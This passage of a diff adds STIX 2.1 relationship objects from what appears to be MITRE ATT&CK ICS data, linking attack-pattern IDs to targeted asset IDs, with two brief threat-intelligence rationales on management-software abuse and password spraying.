+ "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--570ac391-19a2-4c79-ab87-3ec0bbbee9bc", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--570b2d8a-d4d8-424d-8935-9654f6bbdec8", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5725592c-3cf1-4145-923c-603387793129", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--572a8dd2-9495-4864-83e1-6f209460b645", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--572eedce-0484-46a7-a0f4-8b55fb067964", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--577b53a0-44ff-4cc4-b571-455d61e596c0", + "created": "2023-09-28T20:27:17.431Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:27:17.431Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--57861638-2e3f-41e7-b089-9e883371dfd0", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--57932175-4fe3-4ea1-b758-4cb6156273b2", + "created": "2020-01-17T16:52:36.096Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--dd901512-6e37-4155-943b-453e3777b125", + "target_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--579a57f9-65d8-4b7f-b549-b081ce9020e4", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--579bdadc-b080-49f1-be32-283b06444569", + "created": "2020-10-01T01:09:53.313Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", + "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--57a31238-b362-4c07-b8ae-45a619ece297", + "created": "2020-01-24T14:56:24.425Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--57c7836f-446e-4854-8d3f-e4683789aee2", + "created": "2024-06-27T09:03:18.714Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:03:18.714Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--57d20cec-ccc3-4fe7-a847-f8908b5e69b7", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--57f8be8f-6bdb-4bee-a8af-335b3b651778", + "created": "2024-05-22T15:26:11.460Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:26:11.460Z", + "description": "Asset Mapping Rationale: Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.", + "relationship_type": "targets", + "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5805b5e0-e3ca-48e7-825e-dbfe91911715", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--581d2e90-fe07-4080-bb55-8909acc80e49", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--58212595-52cd-432c-8c1d-d41cbe19b8b3", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5826c2f8-007a-43e3-911c-5db498a5d82c", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--582daca0-cb9d-467e-9831-630fd33d3ac6", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--58507147-1399-41bc-b3f1-524073b69919", + "created": "2024-06-26T13:38:56.215Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:38:56.215Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5858d184-19ff-4958-9471-96f0e5ef77ad", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--589c4fa0-f11c-4c8b-be89-0cef0eeb2973", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--58a95ec2-0079-4d58-a7ed-02664c1095ba", + "created": "2023-09-28T19:38:03.976Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:38:03.976Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--58d4a331-a175-4e9d-8775-9a6d76383607", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--58ec33cc-fe70-4b99-8b57-139ca32d4020", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--58f5c89c-7ed2-4e14-ac07-6e95da16e2f1", + "created": "2023-09-28T20:27:33.713Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:27:33.713Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--58f95bda-197e-47c4-931e-3fd1586b4bb5", + "created": "2024-06-27T09:39:16.919Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:39:16.919Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--58fab783-03be-4806-8fd6-c89c0574663b", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5917b1b8-32e0-4d23-a656-2b2620612329", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--59493538-00c3-49d1-85c7-36c0e5717050", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5968cbde-b3da-46df-a8bd-a30c2d85363b", + "created": "2023-09-28T21:28:21.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:28:21.910Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--598080aa-5de8-47f0-87a2-a471b1f8a0f3", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--59965456-652c-469f-88d7-eb821dc66835", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--59998dff-bf59-4a64-ac41-04fb54ded071", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--59a36e12-1f26-41b1-b191-ea5d66a5ef18", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--59aad4ce-6728-4988-8a17-9f223629c7cd", + "created": "2024-05-22T17:22:16.145Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:12:46.315Z", + "description": "Asset Mapping Rationale: Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Typically, management services over commonly used ports are used when password spraying.", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--59b53303-e4df-49ec-8e5a-812f2b4265a8", + "created": "2023-09-29T17:09:25.690Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:09:25.690Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--59b7cc7f-469c-4dba-8ee0-4d458777abe7", + "created": "2023-03-23T19:55:28.695Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-23T19:55:28.695Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": 